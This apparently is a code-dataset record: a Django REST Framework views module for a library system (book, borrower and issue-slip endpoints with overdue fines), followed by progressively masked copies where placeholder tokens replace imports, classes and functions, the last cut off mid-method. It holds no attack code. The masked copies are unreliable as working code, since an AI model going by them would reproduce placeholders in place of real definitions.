return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class TeacherViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.filter(borrower_type__iexact='T')
authentication_classes = (TokenAuthentication,)
permission_classes = (ReadUpdateTeacherPermission,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
def destroy(self, request, pk):
teacher = self.get_object()
teacher.is_active = False
teacher.save()
return Response("{'message':'Deleted'}",status=status.HTTP_200_OK)
class BorrowerViewSet(viewsets.ModelViewSet):
queryset = Borrower.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAdminUser,)
def get_serializer_class(self):
if hasattr(self, 'action') and self.action == 'list':
return BorrowerSerializer
elif hasattr(self, 'action') and self.action == 'retrieve':
return BorrowerDetailSerializer
return BorrowerDetailSerializer
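# Issue/return workflow: create() issues a book, partial_update() processes a return and computes any fine.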
class IssueSlipViewSet(viewsets.ModelViewSet):
queryset = IssueSlip.objects.all()
authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAdminUser,)
serializer_class = IssueSlipSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response({'msg': 'The Book has been issued'}, status=status.HTTP_201_CREATED)
def partial_update(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
issue_object = IssueSlip.objects.get(id=kwargs['pk'])
book_object = Book.objects.get(id=issue_object.book_id)
borrower_object = Borrower.objects.get(id=issue_object.borrower_id)
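        # Returning the book: make it available again and free one of the borrower's issue slots.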
book_object.is_available = True
borrower_object.issue_count -= 1
book_object.save()
borrower_object.save()
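        # Note: datetime.now() is naive; a project with USE_TZ=True would need
        # django.utils.timezone.now() here to compare against an aware due_date.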
actual_return_date = datetime.now().replace(second=0, microsecond=0)
if issue_object.due_date >= actual_return_date:
request.data['actual_return_date'] = actual_return_date
self.update(request, *args, **kwargs)
return Response({'msg': 'You have no fine to pay'}, status=status.HTTP_200_OK)
        else:
            # Fine accrues per full minute overdue; total_seconds() also covers multi-day delays,
            # which the original .seconds (capped below one day) would not.
            elapsed_time = actual_return_date - issue_object.due_date
            fine_amount = int(elapsed_time.total_seconds() // 60)
request.data['actual_return_date'] = actual_return_date
request.data['fine_amount'] = fine_amount
self.update(request, *args, **kwargs)
return Response({'msg': 'You have a fine to pay', 'fine': fine_amount}, status=status.HTTP_200_OK)
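# --- Usage sketch (illustrative, not part of this module) ---
# These viewsets would typically be registered in a urls.py with DRF's DefaultRouter;
# the route prefixes and basenames below are assumptions, not taken from this project.
#
# from rest_framework.routers import DefaultRouter
# router = DefaultRouter()
# router.register(r'books', BookViewSet, basename='book')
# router.register(r'students', StudentViewSet, basename='student')
# router.register(r'teachers', TeacherViewSet, basename='teacher')
# router.register(r'borrowers', BorrowerViewSet, basename='borrower')
# router.register(r'issueslips', IssueSlipViewSet, basename='issueslip')
# urlpatterns = router.urls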
# def list(self, request):
# pass
# def create(self, request):
# pass
# def retrieve(self, request, pk=None):
# pass
# def update(self, request, pk=None):
# pass
# def partial_update(self, request, pk=None):
# pass
# def destroy(self, request, pk=None):
# pass | [
"from datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAdminUser\nfrom .models import Book, Borrower, IssueSlip\nfrom .permissions import (\n ReadBookPermission,\n ReadUpdateStudentPermission,\n ReadUpdateTeacherPermission\n)\nfrom .serializers import (\n BookSerializer,\n BookDetailSerializer,\n BorrowerSerializer,\n BorrowerDetailSerializer,\n IssueSlipSerializer\n)\n\n# def ObjectInactive(self, request, pk):\n# object = self.get_object()\n# object.is_active = False\n# object.save()\n# return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\nclass CustomAuthToken(ObtainAuthToken):\n\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context={'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({\n 'token': token.key,\n 'user_id': user.pk,\n 'email': user.email\n })\n\nclass BookViewSet(viewsets.ModelViewSet):\n\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadBookPermission,)\n queryset = Book.objects.all()\n \n def get_serializer_class(self):\n\n if hasattr(self, 'action') and self.action == 'list': \n return BookSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n \n return BookDetailSerializer\n \n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass StudentViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadUpdateStudentPermission,)\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list': \n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = (TokenAuthentication,)\n permission_classes = (ReadUpdateTeacherPermission,)\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list': \n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\",status=status.HTTP_200_OK)\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n\n queryset = Borrower.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAdminUser,)\n\n def get_serializer_class(self):\n if hasattr(self, 
'action') and self.action == 'list':\n return BorrowerSerializer\n\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n\n return BorrowerDetailSerializer\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n\n queryset = IssueSlip.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAdminUser),\n serializer_class = IssueSlipSerializer\n\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.HTTP_201_CREATED)\n \n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date: \n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs) \n return Response({'msg': 'You have no fine to pay'}, status=status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds//60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount \n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine': fine_amount}, status=status.HTTP_200_OK)\n\n# def list(self, request):\n# pass\n\n# def create(self, request):\n# pass\n\n# def retrieve(self, request, pk=None):\n# pass\n\n# def update(self, request, pk=None):\n# pass\n\n# def partial_update(self, request, pk=None):\n# pass\n\n# def destroy(self, request, pk=None):\n# pass",
"from datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAdminUser\nfrom .models import Book, Borrower, IssueSlip\nfrom .permissions import ReadBookPermission, ReadUpdateStudentPermission, ReadUpdateTeacherPermission\nfrom .serializers import BookSerializer, BookDetailSerializer, BorrowerSerializer, BorrowerDetailSerializer, IssueSlipSerializer\n\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n 
queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n\n\nclass HomePage:\n\n def index(request):\n return render(request, 'index.html')\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = 
Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n\n\nclass HomePage:\n <function token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n 
borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = 
Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n <function token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n 
self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n 